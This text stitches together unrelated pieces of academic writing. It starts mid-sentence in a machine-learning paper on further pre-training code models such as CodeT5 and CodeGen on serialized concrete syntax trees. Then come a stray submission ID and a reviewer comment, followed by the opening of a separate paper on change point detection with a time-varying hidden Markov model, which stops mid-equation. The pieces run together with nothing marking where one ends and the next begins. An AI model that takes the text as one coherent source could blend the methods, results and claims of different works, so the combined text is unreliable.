serialized CSTs to inject structural information into the model. 3 Structured Code Representation A compiler transforms the high-level source code written by programmers into low-level machine code that can be executed on a computer’s hardware. Broadly speaking, the compilation consists of two phases: the front end (analysis) and the back end (synthesis) (Aho et al., 2007). The front end includes lexical analysis (tokenization), syntax analysis (parsing), and semantic analysis, generating an AST or a similar intermediate representation that captures the program’s logical structure and semantics. Therein, grammar specifies how keywords, identifiers, and literals should be structured, which the front-end uses to break the source code into individual tokens and create the syntax tree, ensuring that the source code adheres to the language’s syntax rules. 3.1 Concrete Syntax Tree In more details, compiler front ends typically start by creating a CST from the input source code and then abstract away the non-essential details from the CST to create the AST. A CST is a tree representation of the source code according to the language’s grammar. It closely mirrors the code’s textual structure and includes all the syntactic details like parentheses and punctuation. In contrast, an AST simplifies the CST, retaining only the program’s logical structure. While ASTs are more commonly used due to the balance they strike between compactness and preserving essential program structures for further analysis and transformations, we use CSTs for program representations for several reasons. First, CSTs faithfully retain the exact syntactic structure, including all punctuations, whitespaces, and formatting. This preservation of syntax is essential when one must provide all the details of the code to the model and precisely reconstruct the code from the model generated CST. Second, CSTs are more generally applicable than ASTs, as they can be built directly from the language’s grammar without resorting to language-specific optimizations or implementations required by the ASTs. We do note however that CSTs are typically more verbose than ASTs due to their inclusion of all syntactic details. 3.2 Serialization and Deserialization CST is an n-ary tree, where each node can have a finite but arbitrary number of children. We call the leaf nodes, terminal nodes, and the rest, non-terminal nodes. The terminal nodes contain all textual information of the code while the non-terminal nodes correspond to grammar rules. In Figure 1, terminal nodes have a filled background and one sees that these nodes are sufficient to deduce the program from the tree. However, one must serialize the tree to make it consumable by a typical Transformer, which in turn admits a guaranteed process for deserialization in subsequent uses. To this end, we define the serialization as a pre-post-order tree traversal, where a node is visited before its ordered children and is revisited after all its descendants have been visited. Let Node denote the current node and let subtree denote the subtree rooted at Node and excluding Node. Then, the serialization reads (recursively) \( (\_, \text{Node} \text{ subtree} \text{ Node}.\_), \) where (\_, \text{Node} \text{ and} \text{ Node}.\_) are separate tokens that represent the first and second visit of Node in the traversal. See Figure 1 for an example. Explicitly marking the boundary of the subtree by (\_, \text{Node} \text{ and} \text{ Node}.\_) is necessary to ensure unambiguous deserialization. For more examples, see Appendix A. 4 Adapting Pre-Trained Models to Code Structures Existing pre-trained models are generally trained on source code treated as plain text without explicit incorporation of the structural information. We propose to adapt these models to code structures by using serialized parse trees for further pre-training and fine-tuning, whenever possible. The fine-tuning part is straightforward. However, fine-tuning only is not sufficient to learn embeddings for the non-terminal nodes. Hence, in this section, we mainly discuss the pre-training part, specifically pre-training tasks. Note that often training data include not only code but also text (e.g., source code with comments). We develop pre-training tasks that effectively learn the structural elements that can go in cohort with the remaining code and text. In what follows, we use \( x, y, z \) to denote natural language text, program text, and the corresponding serialized parse tree, respectively. 4.1 Encoder-Decoder Models Masked SubTree Prediction (MSP) To learn the tree structure, we propose to randomly mask subtrees before encoding and ask the decoder to predict them (see Figure 1). Specifically, we mask 15% of the nodes in the parse tree, by randomly selecting non-terminal nodes and masking their entire subtrees, until the budget is attained. We replace each of the selected subtree with the same mask token and ask the model to predict these subtrees. After serialization, masking subtrees is effectively equivalent to masking the corresponding span from the sequence of the serialized tree. Hence, this technique can be considered a tree extension of the masked span prediction objective popularly used in natural language models (Raffel et al., 2020; Joshi et al., 2020; Wang et al., 2021). The training objective can be written as \[ L_{\text{MSP}} = \sum_{t=1}^{k} \log p(z_t^{\text{mask}} | z^{\backslash \text{mask}}, z^{\text{mask}}_{<t}), \] where \( z^{\backslash \text{mask}} \) is the masked input and \( z_t^{\text{mask}} \) is the masked sequence to predict with length \( k \). Since the subtrees include non-terminal and terminal nodes, this task aids the model in learning the relationship between language grammar (non-terminal nodes) and code semantics (terminal nodes). **Masked Node Prediction (MNP)** To enable the model to further learn the language grammar, we propose the masked node prediction objective, where all the non-terminal nodes are masked by a unique sentinel token and they together form, in the original order, a sequence \( I \). The decoder is then asked to predict \( I \) (see Figure 1). This task is similar to the masked identifier prediction objective of Wang et al. (2021) and the DOBF objective of Lachaux et al. (2021), except that the masked tokens here are not the original program tokens. The training objective can be written as \[ L_{\text{MNP}} = \sum_{t=1}^{|I|} \log p(I_t | z \setminus I, I_{<t}), \] where \( z \setminus I \) denotes the serialized tree with non-terminal nodes masked. We note that this is a much harder task than the MSP objective, because in MNP the majority of the tree is masked and the model has to learn the language grammar to predict them. **Text-to-Tree (TeTr) and Tree-to-Text Conversion (TrTe)** When the data contains natural language ↔ code pairs (e.g., code with the natural language description), we encode either part and decode the other to align both parts. The training objectives can be written as \[ L_{\text{TeTr}} = \sum_{t=1}^{|z|} \log p(z_t | x, z_{<t}) \quad L_{\text{TrTe}} = \sum_{t=1}^{|x|} \log p(x_t | z, x_{<t}), \] which are similar to the typical objectives \( \log p(y_t | x, y_{<t}) \) and \( \log p(x_t | y, x_{<t}) \) used in Wang et al. (2021), except that code \( y \) is replaced by serialized tree \( z \). These two tasks match the downstream utilization of the model, where it has to either generate code given natural language description or summarize the given code in natural language. ### 4.2 Decoder-Only Models For decoder-only models, we find that it is effective to reuse the causal language modelling objective over the serialized tree \( z \): \[ L_{\text{DEC}} = \sum_{t=1}^{|z|} \log p(z_t | z_{<t}). \] When there exist natural language ↔ code pairs, we replace \( z \) in the above formula by \( z' = [x : z] \); that is, concatenating text and code. Compared with the specialized objectives MSP and MNP for encoder-decoder models, here we require the model to reconstruct all tokens (both terminal and non-terminal nodes) in an autoregressive manner. ## 5 Experiment Setup ### 5.1 Pretrained Models and Tokenizers To evaluate the proposed method, we use two existing pre-trained models, one encoder-decoder and other decoder-only. - **CodeT5** (Wang et al., 2021) is an encoder-decoder model trained on the CodeSearchNet dataset (Husain et al., 2019) using denoising seq2seq objectives on code data, along with bimodal conversion objectives between natural language and code. We use the CodeT5-base (220M) model for experiments. - **CodeGen** (Nijkamp et al., 2022) is a decoder-only model sequentially trained on the English corpus (CodeGen-NL), followed by a code dataset collected from Google’s BigQuery (CodeGen-Multi), and then a Python dataset (CodeGen-Mono). We use the CodeGen-Multi (350M) model for experiments. In addition to adapting the pre-trained models to structures, we augment the respective tokenizer by including the non-terminal nodes, each treated as one token. This allows the model to learn targeted embeddings for the non-terminal nodes and also makes the input/output length manageable. In the ablation study (Section 7), we will show that without including the non-terminal node tokens in the tokenizer will substantially compromise the downstream performance. 5.2 Pre-Training Dataset We use the CodeSearchNet dataset augmented partially by the Stack dataset (Kocetkov et al., 2022) to further train the pre-trained models. CodeSearchNet contains nearly 6.5 million data samples extracted from the most popular GitHub projects with permissive licenses. Among them, around 2.3 million samples have comments accompanying the code, while the remaining are code segments only. CodeSearchNet contains six programming languages. However, it misses some languages that are used in our downstream tasks; namely, C and C#. To include these languages, we subsample 1 million samples for each from the Stack dataset, which results in a total of 8.5 million samples across eight programming languages. More details are given in Appendix B. 5.3 Continual Pre-Training We further pre-train CodeT5 and CodeGen by using the objectives described in Section 4. We train for one epoch, by using 32 V100-32GB GPUs with an effective batch size of 1024. We provide the list of hyper-parameters in Appendix C. It is important to note that the continual pre-training is rather lightweight. Compared with the reported training time of 12 days by using 16 A100-40GB GPUs for the CodeT5 model and 450,000 steps for the CodeGen model, our continual pre-training takes only 15 hours for CodeT5 and approximately 8,000 steps for CodeGen. 5.4 Data-Efficient Fine-Tuning Existing benchmarks for evaluating code models typically use datasets containing a few thousand to several hundred thousand data samples. For instance, the Java-to-C# code translation dataset in CodeXGLUE (Lu et al., 2021) contain 10.3k samples, while the text-to-code Concode dataset (Iyer et al., 2018) contains 100k samples. While it is possible to curate data at expensive cost in a one-time effort, in many scenarios dataset creation can be financially burdensome and even practically unattainable. This issue is even more pronounced for low-resource languages or domain-specific languages. Hence, we direct our attention on low-data scenarios by using data-efficient approaches. In this context, our experiment setting is to fine-tune models using only a few hundred samples, with the overarching aim of improving downstream performance on small data. 5.5 Evaluation Metrics Evaluating generative models for code initially followed procedures similar to evaluating text generation. Evaluation method included comparing generated code sample to reference samples using BLEU score (Papineni et al., 2002) or Exact Match (EM). However, EM fails to consider code variability in achieving the same objective, and BLEU’s correlation with semantic code correctness is weak, as highlighted by Tran et al. (2019). To address this, Ren et al. (2020) introduced CodeBLEU, a composite metric combining BLEU, weighted n-gram matching, syntactic AST matching, and semantic data flow matching, demonstrating stronger alignment with human-assessed code quality. Along with fuzzy metrics, recent studies, including Roziere et al. (2020) and Kulal et al. (2019), turned to functional correctness assessment. This approach involves generating multiple code samples and deeming the problem solved if any sample passes all test cases. Chen et al. (2021) further refined this method, addressing its high variance with an unbiased estimator. In our work, we adopt the estimator introduced by Chen et al. (2021) to gauge functional correctness. 6 Results To evaluate the effectiveness of our approach, we fine-tune CodeT5 (+structure) and CodeGen (+structure) on five downstream tasks, including code translation, code generation, and code summarization. For each task, we fine-tune the models with a few hundred data examples but evaluate the test accuracy on the complete test set. We repeat each experiment with five random seeds and report mean and standard deviation. 6.1 Code Translation Code translation benchmarks aim to translate reasonable-length code segments from one programming language to another. Code translation has many practical values, such as in IT modernization, where legacy code needs be rewritten by using a modern language for reducing the maintenance cost. For this task, we use the Java-C# translation dataset available within the CodeXGLUE benchmark (Lu et al., 2021). This dataset contains parallel code between Java and C# on the function level; it was extracted from multiple open-source projects that contain parallel implementations. The results for Java-to-C# and C#-to-Java are shown in Figure 2. We see that both base models perform poorly when fine-tuned with only 100 examples but they keep being improved with more and more examples. Specifically, the encoder-decoder model CodeT5 performs better than the decoder-only model CodeGen. Additionally, we observe that the structured models consistently outperform their base counterparts by a significant margin, in both translation directions. It is worth noting that the greatest improvement appears in CodeT5, where fine-tuning with as few as 100 examples results in an improvement of nearly 15 BLEU score points and 8 CodeBLEU score points in both directions. Similar improvements remain as we progressively increase the number of examples to 1000. 6.2 Code Generation Code generation is the task of generating source code given a natural language description. For this task, we test our method on three datasets: (a) the CoNaLa dataset (Yin et al., 2018), which contains curated pairs of descriptions and Python program snippets mined from StackOverflow; (b) the Concode dataset (Iyer et al., 2018), which consists of paired Java programs and comments collected from GitHub projects; and (c) the Mostly Basic Python Programming (MBPP) dataset (Austin et al., 2021) — a crowd-sourced dataset of Python programs along with descriptions. In Figure 3, we present the results for these benchmarks. For the CoNaLa and Concode benchmarks, we report the BLEU, CodeBLEU, and the EM scores. On the other hand, for the MBPP benchmark, we report the pass@1 score instead of EM, because this dataset contains unit tests for each data sample. For the CoNaLa benchmark, we observe that both the CodeT5 (Structured) model and the CodeGen (Structured) model outperform their base variants by nearly 15 BLEU score points and 10 CodeBLEU score points. It is worth highlighting that while the CodeGen base variant underperforms the CodeT5 model on this benchmark, the structured CodeGen counterpart outperforms both the base variants by a large margin. For the Concode benchmark, we see substantial improvements in the CodeBLEU scores for both structured models, but the results on the BLEU score for the CodeT5 (Structured) model are mixed — lagging behind the base variant for the initial data points. Finally, on the MBPP benchmark, we observe significant improvements for all three metrics. Both models improve the BLEU and CodeBLEU scores, but the CodeT5 (Structured) model also significantly improves the pass@1 metric from 1.68% to 4.40% when utilizing only 100 fine-tuning samples, and improving from 4.72% to 6.48% when utilizing all 374 examples available in the MBPP benchmark. The decoder-only model CodeGen too displays improvements across all three metrics — improvements up to 10 BLEU and CodeBLEU score points, and improving the pass@1 score by 1 percentage point. 6.3 CODE SUMMARIZATION Code summarization is the task of generating a natural language description for a given code segment. We utilize the CodeSearchNet dataset (Husain et al., 2019) to evaluate the performance across six programming languages. In Figure 4, we show the average BLEU scores. Detailed results for each language are provided in Appendix D. We observe that the CodeT5 (Structured) model improves the average performance by 0.5 BLEU score points when fine-tuned with only 100 examples, but this performance gap improves to about 2 BLEU score points when utilizing 500 fine-tuning examples. Similarly, the CodeGen (Structured) model demonstrates improvement over its baseline variant, albeit with relatively modest gains — an improvement of 0.5 BLEU score points over the baseline with 500 fine-tuning examples. 7 ABLATION ANALYSIS In this section, we aim to better understand the key contributors to the improved performance of structured code models compared to their base variants. We investigate three downstream tasks, namely, code translation from Java to C#, code summarization for Go, and code generation with the Concode dataset. For each of these tasks, we fine-tune the CodeT5 model with 500 examples and present the mean BLEU and CodeBLEU scores over five random seeds in Figure 5. We note the observations below. **Fine-tuning base models on serialized parse trees only results in performance drop** For this experiment, instead of fine-tuning the base model on source code as text, we fine-tune it on serialized parse trees. This allows us to understand the role of serialized trees alone in the model performance. Interestingly, we observe a significant drop in performance for all three tasks as compared to the base variant, indicating that naively fine-tuning the base models on serialized parse trees does not result in any performance gain. We note that the key reasons behind this performance drop are: (a) the non-terminal nodes being split up into multiple sub-tokens resulting in context loss, and (b) increased length of input/output sequences resulting in greater truncation of context. **Adding new non-terminal tokens to the base model results in performance gain** We next experiment with adding the non-terminal nodes in the parse tree as special tokens to the tokenizer and then fine-tuning the model. With the updated tokenizer, we allow the model to learn specialized embeddings for non-terminal nodes and also allow the length of the input/output sequences to be manageable. We note that adding non-terminal nodes as special tokens in the tokenizer helps the model achieve better performance. However, as compared to the base model, the results are mixed. On translation tasks, the performance is better than the base model, but for summarization and generation tasks the performance lags behind the base model. **Continual pre-training provides additional performance gains** We next compare the performance of the structured model – model with the updated tokenizer and adapted to structures through continued pre-training – with the variants noted above. We find that the structured model achieves the best performance across all tasks and metrics, suggesting that both the updated tokenizer and the pre-training objectives play important roles in improving the model performance across all tasks. 8 CONCLUSIONS In this work, we explore data-efficient fine-tuning of code language models by utilizing the serialized parse tree of source code. We develop training objectives for both encoder-decoder and decoder-only models to enable the adaptation of existing pre-trained models to code structures. Evaluating the approach on multiple downstream tasks, including code translation, generation, and summarization, we observe significant gains in both fuzzy metrics (BLEU and CodeBLEU scores) and functional metrics (pass@k score), especially in low-data scenarios. REFERENCES Wasi Ahmad, Saikat Chakraborty, Baishakh Ray, and Kai-Wei Chang. Unified pre-training for program understanding and generation. In Proceedings of the 2021 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pp. 2655–2668, 2021. Aho, M Lam, R Sethi, J Ullman, Keith Cooper, Linda Torczon, and S Muchnick. Compilers: Principles, techniques and tools. 2007. Miltiadis Allamanis, Earl T Barr, Christian Bird, and Charles Sutton. Learning natural coding conventions. In Proceedings of the 22nd acm sigsoft international symposium on foundations of software engineering, pp. 281–293, 2014. Miltiadis Allamanis, Hao Peng, and Charles Sutton. A convolutional attention network for extreme summarization of source code. In International conference on machine learning, pp. 2091–2100. PMLR, 2016. Miltiadis Allamanis, Marc Brockschmidt, and Mahmoud Khademi. Learning to represent programs with graphs. In ICLR, 2018. Frances E. Allen. Control flow analysis. SIGPLAN Notices, 5(7):1–19, 1970. Jacob Austin, Augustus Odena, Maxwell Nye, Maarten Bosma, Henryk Michalewski, David Dohan, Ellen Jiang, Carrie Cai, Michael Terry, Quoc Le, et al. Program synthesis with large language models. arXiv preprint arXiv:2108.07732, 2021. Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. arXiv preprint arXiv:2107.03374, 2021. Ron Cytron, Jeanne Ferrante, Barry K. Rosen, Mark N. Wegman, and F. Kenneth Zadeck. Efficiently computing static single assignment form and the control dependence graph. ACM Trans. Program. Lang. Syst., 13(4):451–490, 1991. Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, et al. Codebert: A pre-trained model for programming and natural languages. In Findings of the Association for Computational Linguistics: EMNLP 2020, pp. 1536–1547, 2020. Jeanne Ferrante, Karl J. Ottenstein, and Joe D. Warren. The program dependence graph and its use in optimization. ACM Trans. Program. Lang. Syst., 9(3):319–349, 1987. Jurgen Graf. Speeding up context-, object- and field-sensitive SDG generation. In 2010 10th IEEE Working Conference on Source Code Analysis and Manipulation, 2010. Xiaodong Gu, Hongyu Zhang, Dongmei Zhang, and Sunghun Kim. Deep api learning. In Proceedings of the 2016 24th ACM SIGSOFT international symposium on foundations of software engineering, pp. 631–642, 2016. Daya Guo, Shuo Ren, Shuai Lu, Zhangyin Feng, Duyu Tang, LIU Shujie, Long Zhou, Nan Duan, Alexey Svyatkovskiy, Shengyu Fu, et al. Graphcodebert: Pre-training code representations with data flow. In International Conference on Learning Representations, 2020. Daya Guo, Shuai Lu, Nan Duan, Yanlin Wang, Ming Zhou, and Jian Yin. Unixcoder: Unified cross-modal pre-training for code representation. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 7212–7225, 2022. Xing Hu, Ge Li, Xin Xia, David Lo, and Zhi Jin. Deep code comment generation. In Proceedings of the 26th conference on program comprehension, pp. 200–210, 2018. Hamel Husain, Ho-Hsiang Wu, Tiferet Gazit, Miltiadis Allamanis, and Marc Brockschmidt. Codesearchnet challenge: Evaluating the state of semantic code search. arXiv preprint arXiv:1909.09436, 2019.
I5MquO1g7R
In the second sentence, it is also mention that $Q$ can be modeled using non parametric techniques, but the following sentence (and the presented algorithm) only deal with a parametric distribution (with parameter $\Phi$). It might be good to mention how the algorithm is changed when a non-parametric density estimation method is used.
CHANGE POINT DETECTION VIA VARIATIONAL TIME-VARYING HIDDEN MARKOV MODEL Anonymous authors Paper under double-blind review ABSTRACT The task of modeling time series data that exhibit sudden regime shifts has been an enduring focus of research due to its inherent complexity. Among the various strategies to tackle this issue, the Hidden Markov Model (HMM) has been extensively investigated, which captures the regime changes by modeling the transition between latent states. Despite its popularity, the HMM-based methodology carries certain limitations, including specific distribution assumptions and its computational intensity for inference and learning, particularly when the number of change points is unidentified. In this work, we propose a novel approach that models the location of change points and introduce the TV-HMM, a variant of the Hidden Markov Model incorporating the time-varying location transition matrix. Based on the novel modeling scheme, we propose an associated variational EM algorithm that simultaneously detects the locations and the number of change points, together with inferring the posterior distributions of regime parameters. In contrast to previous approaches, the proposed method exhibits robustness against the misspecification of change point numbers and can be augmented with stochastic approximation techniques to effectively mitigate the computational burden. Furthermore, we establish the statistical consistency of the change point location estimation under the Gaussian likelihood assumption. We also generalize the parametric likelihood function using the Maximum Mean Discrepancy (MMD) and propose the semi-parametric TV-HMM that is free of distribution assumptions. A series of experiments validate the theoretical convergence rate and demonstrate our estimation accuracy in terms of Rand index and MSE. 1 INTRODUCTION One of the fundamental tasks in signal processing and time series analysis is identifying and analyzing a complex system with temporal evolution. The states of systems are measured over time by a sequence of observations. Evaluating the locations of abrupt distributional changes within the sequence is commonly known as the Change Point Detection (CPD) problem. Practically, many applications require solving the CPD problem, where the proposed methods are helpful for subsequent analysis of the sequence characteristics, such as gait analysis (Lee & Grimson [2002]), anomaly detection (Liu et al. [2018]), biological diagnostics (Gardner et al. [2006]), financial analysis (Andreou & Ghysels [2002]), and more. In this paper, we focus on offline change point detection methods (Truong et al. [2020]), which analyze and operate the complete dataset retrospectively. Compared to the online CPD methods (Adams & MacKay [2007], Chang et al. [2019]), these methods are better suited for complex modeling and they have access to the entire observations, which enables higher detection accuracy and a more comprehensive understanding of the overall patterns, trends, and characteristics of the regimes between the adjacent change points. There is rich literature related to the offline change point detection problem. The early work can be traced back to the 1950s, which focuses on detecting the mean value changes of independent and identically distributed (i.i.d) Gaussian random variables (Page [1955]). From the methodology perspective, Pein et al. [2017] detects change points based on ubiquitous maximum likelihood estimation. With the piecewise linear model assumption, Bai & Perron [1998] minimizes the squared and absolute cost function on the observed sequence and the parameters. Harchaoui & Cappé [2007] detect the change point by minimizing the kernel distance of observations in reproducing kernel Hilbert space while Zou et al. (2014) uses the empirical distribution divergence measurement. When it comes to the Bayesian approaches, Barry & Hartigan (1993), Park & Dunson (2010), Müller et al. (2011) develop the product partition model (PPM) for offline CPD, and Chib (1998) introduces a Hidden Markov Model (HMM) and determines the latent change point state by the Markov Chain Monte Carlo (MCMC) algorithm. Pesaran et al. (2006) introduces a hierarchical structure on HMM where parameters follow certain common meta-distributions. Assuming regime durations have a Poisson distribution, Koop & Potter (2007) develops a time-varying parameter model with hierarchical prior distributions to detect change points. Additionally, Ko et al. (2015) combines the Dirichlet process with HMM to estimate the latent state without prior specification of the number of states. The comprehensive review of offline change point methods can be found in Truong et al. (2020). However, the effectiveness of these methods can be influenced by various hyper-parameters, e.g., the number of change points, significance level, or penalty coefficients. Killick et al. (2012) adapts the CPD algorithm with a linear penalty on the number of change points. Determining the optimal values for these parameters may require specialized knowledge or additional evaluation criteria (Burnham & Anderson, 2004). Although some non-parametric Bayesian models (Ko et al., 2015; Peluso et al., 2019) do not require a predetermined number of change points, they often involve computationally intensive processes, such as MCMC sampling, to obtain posterior distributions for the entire dataset. Furthermore, previous studies on Bayesian CPD have mainly focused on algorithmic design and lack strong theoretical guarantees. The convergence rate and performance of these methods may vary depending on the specific problem and settings. Additionally, many CPD methods rely on parametric distributions, often assuming each observation to be normally distributed in order to detect changes in mean and variance. While these assumptions offer advantages in terms of interpretability and inference efficiency, it is still preferable to have a CPD method that is not limited by the likelihood assumption, as it would be more robust against model misspecification and outliers. Therefore, these limitations make these methods less practical for real-world applications and datasets. In order to overcome the challenges of hyperparameter selection and computational burden, we propose the Time-Varying Hidden Markov Model (TV-HMM). Concisely, our contributions are as follows: 1) TV-HMM models the locations of change points with the time-varying Markov chain. Its transition matrix takes into account the size of the sequence length, encompassing all possible locations. The adaptive updating of the transition matrix for each change point allows for more efficient change point detection without prior knowledge of the number of change points. 2) We develop a variational EM algorithm that can endogenously determine the necessary number of change points from the observed data. The algorithm leverages stochastic approximation by chronologically sampling an observation subset. This reduces the computational cost compared to MCMC-based inference. Our theoretical analysis demonstrates the statistical consistency of our method in detecting change point locations. 3) To validate our theoretical results, we conduct numerical experiments and evaluate the performance of our proposed method on both simulated and real-world data. These experiments demonstrate the effectiveness and robustness of our approach. 4) We extend the parametric method to the semi-parametric TV-HMM that alleviates the assumption on parametric distribution by using Maximum Mean Discrepancy (MMD) for likelihood measurement. We introduce a new learning objective, MMD-ELBO, and train the model through re-parameterization trick (Kingma et al., 2015). Our experiments show promising performance on non-Gaussian datasets without incorporating distributional knowledge. 2 TIME-VARYING HIDDEN MARKOV MODEL AND LOCATION TRANSITION Given the observed $D$-dimensional sequence $Y = \{y_1, \ldots, y_N\}$ with $y_n \in \mathbb{R}^D$, our goal is to detect all $K$ change point $\{\tau_k\}_{k=1}^{K}$ with each $\tau_k \in \{1, \ldots, N\}$ and estimate the distribution of each regime. There are extensive works with different settings of CPD, such as piecewise i.i.d assumption (Matteson & James, 2014; Li et al., 2015), autoregressive assumption (Yamanishi & Takeuchi, 2002), and others (Kawahara et al., 2007). In this work, we illustrate our method using the common piecewise i.i.d setting, such that \( y_n \) is independently sampled from a distribution \( P_k \) for \( \tau_{k-1} \leq n \leq \tau_k \), with \( \tau_0 = 1 \) and \( \tau_{K+1} = N \). ### 2.1 Time-Varying Hidden Markov Model: A Parametric Case We encode the change point location by a one-hot random variable \( t_k \in \mathbb{R}^N \). Since the \( k \)-th change point should be always no earlier than the \( k - 1 \)-th, the stochastic process \( \{t_1, ..., t_K\} \) is a left-to-right Markov chain with an upper triangular transition matrix. Denoting \( t_k(i) \) as the \( i \)-th element of the vector, the joint distribution of \( \{t_1, ..., t_K\} \) as well as the transition probability matrix between \( t_{k-1} \) and \( t_k \) are given by: \[ p(t_1; \Pi_1)p(t_2|t_1; \Pi_2)\ldots p(t_K|t_{K-1}; \Pi_K) = \prod_{n=1}^{N} \pi_{1,n} \prod_{k=2}^{K} \left[ \prod_{n=1}^{N} \prod_{m=1}^{N} \pi_{k,n,m} x_{k-1}(m) \right], \] with \( \Pi_k := \begin{bmatrix} \pi_{k,1,1} & \pi_{k,1,2} & \cdots & \pi_{k,1,N-1} & \pi_{k,1,N} \\ 0 & \pi_{k,2,2} & \cdots & \pi_{k,2,N-1} & \pi_{k,2,N} \\ \vdots & \vdots & \ddots & \vdots & \vdots \\ 0 & 0 & \cdots & \pi_{k,N-1,N-1} & \pi_{k,N-1,N} \\ 0 & 0 & \cdots & 0 & \pi_{k,N,N} \end{bmatrix}, \) where each element \( \pi_{k,i,j} \) represents the prior probability coefficient that \( k \)-th regime starts at time step \( i \) and ends at \( j \). Note that the previous hidden Markov models (Chib [1998], Ko et al. [2015]) consider a restricted transition matrix whose size is proportional to the state number \( K \). The Markov chain in these methods experiences \( N \)-step transitions along the sequence. On the other hand, our modeling scheme allows the transition probability matrix \( \Pi_k \) to evolve over time and only computes \( K \)-step transitions to improve the inference efficiency. Under the parametric case, the distribution shift between the adjacent regimes is reduced to the change of parameter values. We treat the regime parameters \( (\theta_1, ..., \theta_{K+1}) \) as random variables and introduce \( K + 1 \) prior distributions \( \{p(\theta_k; \alpha_k)\}_{k=1}^{K+1} \), where \( \alpha_k \) denotes all hyperparameters for \( k \)-th regime. For illustration purposes, we consider the Gaussian likelihood case with mean and precision, where \( \theta_k = \{u_k, \Lambda_k\} \) and the conjugate normal-Wishart prior. Given the location indicators \( (t_k, t_{k-1}) \), the random variable \( Y_k \) represents the observations set within the corresponding regime. Under the piecewise i.i.d assumption, the likelihood of the \( k \)-th regime and prior distributions is given by: \[ p(Y_k|t_k, t_{k-1}, \theta_k) = \prod_{i=1}^{N} \prod_{j=i}^{N} \left[ \prod_{t=j}^{t_k(i)} N(y_t | u_k, \Lambda_k) \right]^{t_k(i) \times t_k(j)}, \] \[ u_k \sim N(0, \beta^{-1}I), \quad \Lambda_k \sim W(v_0, V_0), \] where \( W(\cdot) \) denotes the Wishart distribution. In our model specification, \( \pi_{k,i,j} \) can be learned directly from data by optimizing with respect to marginal data likelihood. This probability reflects the relevance of time interval \([i, j]\) with the true regime \([\tau_k, \tau_{k-1}]\). A similar idea has been applied in the hyperparameters learning of Gaussian process (Rasmussen et al., 2006). In our model, since practically the value of \( K \) is unknown, automatic model selection can be performed by learning these probabilities for each \( t_k \). If the corresponding diagonal elements \( \pi_{k,i,i} \) converge to 1, indicating the time length of \( k \)-th regime is zero, then the unnecessary change points can be removed from the model specification. In Section 3.1, we visualize the value of converged \( \Pi_k \) from numerical simulations and illustrate all significant spots concentrating on the true locations and the diagonal. ### 2.2 Inference via Variational EM Algorithm Denoting the set of all latent variables as \( \xi = \{ \{t_k\}_{k=1}^{K}, \{\theta_k\}_{k=1}^{K+1} \} \), TV-HMM detects the locations and number of change points by inferring the posterior distribution of \( \xi \) and learning the transition probability \( \Pi_k \). In the Bayesian literature, Neal (2012) introduces the automatic relevance determination (ARD) procedure for neural network learning. The idea is that optimizing the continuous hyperparameters with respect to marginal log-likelihood provably leads to consistent model selection and obeys Occam’s razor phenomenon (Ghosal et al., 2008; Yang & Pati, 2017). However, Algorithm 1 Variational EM algorithm for Time-Varying Hidden Markov Model Input: The observed sequence: \( Y \); The initial number of change points: \( \tilde{K} \); Maximum iteration: \( I \); Size of sampling subset: \( S \); Step size: \( \eta \); Output: Variational distributions \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \); Marginal probability of CP locations \( \{Q(t_k)\}_{k=1}^{\tilde{K}} \); 1: Initialization of variational expectation of \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \); 2: for \( 1 \leq i_1 \leq I \) do 3: Random sampling \( S \) data point and collect the retrospective order set \( \Omega \); 4: E-Step: 5: Update variational distributions \( \{Q^S(t_k)\}_{k=1}^{\tilde{K}-1}, \{Q^S(t_k, t_{k-1})\}_{k=2}^{\tilde{K}} \) by Equation 3 based on sampled \( S \) observations, with; \[ Q^S(t_k(n) = 1 | t_{k-1}(m) = 1) = \begin{cases} Q^S(t_k(n) = 1 | t_{k-1}(m) = 1) & \text{if } m, n \in \Omega, \\ 0 & \text{otherwise} \end{cases} \] 6: Re-estimate \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \) using Equation 2 based on sampled \( S \) observations; 7: M-Step: 8: Set new prior by \( \pi_{k,m,n} \leftarrow \pi_{k,m,n} + \eta \cdot Q^S(t_k(n) = 1 | t_{k-1}(m) = 1) \); 9: end for Direct marginal likelihood maximization is intractable since it involves the integral over all latent variables. EM algorithm provides a solution where we relax the marginal likelihood function with its lower bound. Denoting the hyperparameters set \( \Pi = \{\Pi_k\}_{k=1}^{K} \) and \( \alpha = \{\alpha_k\}_{k=1}^{K+1} \), we have E-Step. \( L(\Pi | \Pi_{old}) = E_{\xi|Y;\Pi_{old},\alpha}[\log p(Y, \xi; \Pi, \alpha)] \), M-Step. \( \hat{\Pi} = \arg\max_{\Pi} L(\Pi | \Pi_{old}) \). Although the EM algorithm seems feasible, the E-Step requires evaluating the true posterior \( p(\xi | Y; \Pi, \alpha) \), which has no analytical form. Here we further leverage variational approximation and introduce a tractable variational distribution \( Q \) as an approximator of the true posterior under KL divergence. By maximizing the evidence lower bound (ELBO), we minimize the KL divergence between \( Q \) and the true posterior distribution (Blei et al., 2017). Under common mean-field assumption where variational distributions can be independently factorized, we can obtain explicit solutions of optimal approximator \( Q^* \): \[ Q^*(\theta_k) \propto \exp(E_{Q(t_k,t_{k-1})}[\log p(Y_k, t_k, \theta_k | t_{k-1}; \alpha_k, \Pi_k)]) , \] \[ Q^*(t_1,...,t_K) \propto \prod_{k=1}^{K+1} \exp(E_{Q(\theta_k)}[\ln p(Y_k, t_k, \theta_k | t_{k-1}; \Pi_k, \alpha_k)]) . \] Noted that the solution in Equation 2 is a joint distribution of \( \{t_1,...,t_K\} \). However, the primary interest of location detection is marginal distributions \( Q(t_k) \), and \( Q(t_k, t_{k-1}) \) for \( Q^*(\theta_k) \) inference. To obtain these quantities, we propose a recursive message-passing procedure based on the sum-product algorithm. The marginalization is achieved by passing real-valued message functions between the latent variables \( t_k \), which are denoted by: \( \mu_{\rightarrow t_k}, \mu_{t_k \leftarrow} \in \mathbb{R}^N \). These two functions represent the information flow that propagates front and back from subsequent variables: \[ Q(t_k(n) = 1) \propto 